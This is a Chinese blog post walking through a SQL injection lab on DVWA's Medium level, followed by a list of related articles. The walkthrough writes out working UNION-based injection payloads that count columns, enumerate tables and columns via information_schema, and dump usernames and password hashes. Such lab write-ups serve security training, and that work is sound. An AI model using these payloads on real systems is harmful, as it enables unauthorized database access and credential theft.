sql注入 中级

已于 2024-01-10 20:15:18 修改
阅读量328 收藏 9
点赞数 6
文章标签: oracle 数据库
于 2024-01-10 20:07:47 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/C_l_a_r_a/article/details/135511956
版权
本文通过示例详细介绍了如何在Sql注入实验中判断注入类型(数字型),确定字段数,获取数据库名称,数据表信息以及查看用户和密码,涉及到了基本的数据库查询和解密过程。
摘要由CSDN通过智能技术生成

Sql注入Medium

实验准备:火狐浏览器打开手动代理,高级设置,about:config bp安装完成

  1. 判断注入类型

如果是字符串型:1‘ or 1=1

报错:

那就是数字型:1 or 1=1

结论:注入类型为数字型

  1. 判断字段数

猜测字段数为2

id = 1 order by 2

 

id = 1 order by 3

结论:字段数为2

  1. 获取数据库名字

id = 1 union select 1,database()

结论:查到到两个数据库名称,一个是dvwa,一个是admin

  1. 获取dvwa数据库中的数据表

id = 1 union select 1,table_name from information_schema.tables where table_schema=database()

根据:

id = 1 union select 1,table_name from information_schema.tables where table_schema = 0x64767761

结论:获取到两个数据表,分别是guestbook,users

  1. 获取数据表的字段名

id =1 union select 1,column_name from information_schema.columns where table_name = 0x7573657273

  1. 查看用户和密码

id = 1 union select user,password from users

结论:查看到users表的账号和密码

  1. 解密

捞月于清风
关注
渗透攻防Web篇-SQL注入攻击中级
人人为我,我为人人
12-29 641
前言找到SQL注入漏洞后,我们可以用它来干什么呢?那么本篇文章给大家带来的就是SQL注入漏洞利用技术,现在是时候让我们去体验一下漏洞利用的乐趣了。 目录 第三节 利用SQL注入 3.1、识别数据库 3.2、UNION语句提取数据 3.3、枚举数据库 3.4、窃取哈希口令 3.5、获取WebShell 第四节 SQL盲注利用 4.1、初识SQL盲注 4.2、SQL盲注入技术-基于布尔 4.3、SQL盲注入技术-基于时间 4.4、我们的好朋友-Python 正文 第三节 利用SQL注.
DVWA之SQL注入
qq_46416934的博客
07-29 1267
DVWA是一款基于PHP和MYSQL开发的web靶场练习平台,集成了常见的web漏洞如。
SQL注入中级
BlueSky216的博客
07-20 444
sql注入数据库的判断 1、识别数据库 利用web应用技术帮我们判断: ASP和.NET:Microsoft SQL Server PHP : MySQL、PostgreSQL Java : Oracle、MySQL Web容器也给我们提供了线索,比如安装IIS作为服务器平台,后台数据及很有可能是Microsoft SQL Server,而允许Apache和PHP的Linux服务
SQL注入中级篇)Insert注入
热门推荐
weixin_41472455的博客
05-14 6万+
insert注入: 其实对于初学SQL注入,并不需要区分注入类型。 但是要理解insert注入,首先需要理解SQL的insert语句 举个例子 :在Student表插入bob的信息 Student表: |-----------------------------------| | name | age | grade | |-----------------------------------| | andy | 14 | 98 | ...
SQL注入(中)
2401_82388450的博客
03-28 686
Less-8。
DVWA--sql手工注入(中级)
firecjh的博客
06-09 1109
前端页面设置了下拉选择表单,以此来控制用户的输入。模块对‘users’进行编码。
dvwa靶场sql注入中级
06-12
在 DVWA 的 SQL 注入中级靶场中,你需要利用 SQL 注入漏洞来获取数据库中的数据。具体步骤如下: 1. 打开 DVWA 的 SQL 注入中级靶场页面,输入用户名和密码,登录系统。 2. 在页面上找到一个输入框,例如搜索框...
DVWA_SQL注入低中等级讲解
Keiltest的博客
08-10 1063
本章讲解了sql注入
DVWA下的SQL注入
07-25
中级SQL注入中,我们将使用Burp Suite工具来进行更深入的分析和利用。 **步骤一:** 登录DVWA页面并配置Burp Suite监听器: - 在Burp Suite中设置监听器,输入虚拟机IP地址。 - 修改浏览器代理配置为Burp Suite...
sql注入中级实验
2303_77203664的博客
01-10 603
转换为16进制后前面加0x,都是一样,0x是前置位,标志位告诉别人这是16进制数。则,在中级的安全状况下,可以通过代理历览器来获取想要的信息。id=1 or 1=1 order by 3#----报错。id=1 or 1=1 order by 1#----有。id=1 or 1=1 order by 2#----有。在火狐中比较繁琐,所以我们使用BP的重放,打开步骤如下。6.获取user和password这两个字段对应数据。id=1‘ or '1'='1-----显示报错。在抓包内容里我们可以修改。
SQL注入中级篇)盲注
weixin_41472455的博客
05-12 798
盲注: 其实对于初学SQL注入,并不需要区分注入类型。 想要学好一种漏洞最重要的是理解漏洞的原理,也就是漏洞源码, 测试漏洞链接:http://45.32.81.200:8080/vul/sqli/sqli_blind_b.php 当输入 kobe 后, -------------------------------------------------------------- -----------------------------------------------------..
DVWA之SQL注入(低中高级)
qq_43455259的博客
01-20 4807
dvwa之sql注入
安全中级11:sql注入+联合、报错、时间盲注+sqlmap使用
weixin_62870380的博客
07-02 4484
sql注入的原理和流程,以及联合注入、报错注入、时间盲注、布尔盲注以及sqlmap使用。
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 958
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
DVWA中SQL注入
随 风
10-27 3060
一、SQL注入原理 二、SQL注入分类 1、按照数据提交方式分类 (1)GET 注入 (2)POST 注入 (3)Cookie 注入 (4)HTTP 头部注入 2、按照注入点分类 (1)数字型注入点 (2)字符型注入点 (3)搜索型注入点 3、按照执行效果分类 (1)基于布尔的盲注 (2)基于时间的盲注 (3)基于报错的注入 (4)联合查询注入 (5)堆叠注入 (6)宽字节注入 三、SQL注入流程 (1)判断是否存在注入,是数字型还是字符型 (2)猜解SQL查询语句中的字段数 (3)确定显示位置 (4)获取
DVWA——SQL注入
最新发布
m0_74426634的博客
04-07 1159
日前,国内最大的程序员社区CSDN网站的用户数据库被黑客公开发布,600万用户的登录名及密码被公开泄露,随后又有多家网站的用户密码被流传于网络,连日来引发众多网民对自己账号、密码等互联网信息被盗取的普遍担忧。网络安全成为了现在互联网的焦点,这也恰恰触动了每一位用户的神经,由于设计的漏洞导致了不可收拾的恶果,验证了一句话“出来混的,迟早是要还的”,所以介绍一些常用的攻击技术和防范策略。SQL Injection也许很多人都知道或者使用过,如果没有了解或完全没有听过也没有关系,因为接下来我们将介绍SQL Inj
DVWA-SQL注入(全级别)
小纯的博客
02-08 6398
一、SQL注入概念 SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。 二、手工注入常规思路 1.判断是否存在注入,注入是字符型还是数字型 2.猜解SQL查询语句中的字段数 3.确定回显位置 4.获取当前数据库 5.获取数据库中的表 6.获取表中的字段名 7.得到数据 ...
SQL注入类型与技巧
求大佬师傅带
09-01 4676
SQL注入类型与技巧
sql注入方式及知识点总结(超详细)
qq_67473072的博客
07-22 3877
sql注入方式及知识点总结(超详细)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值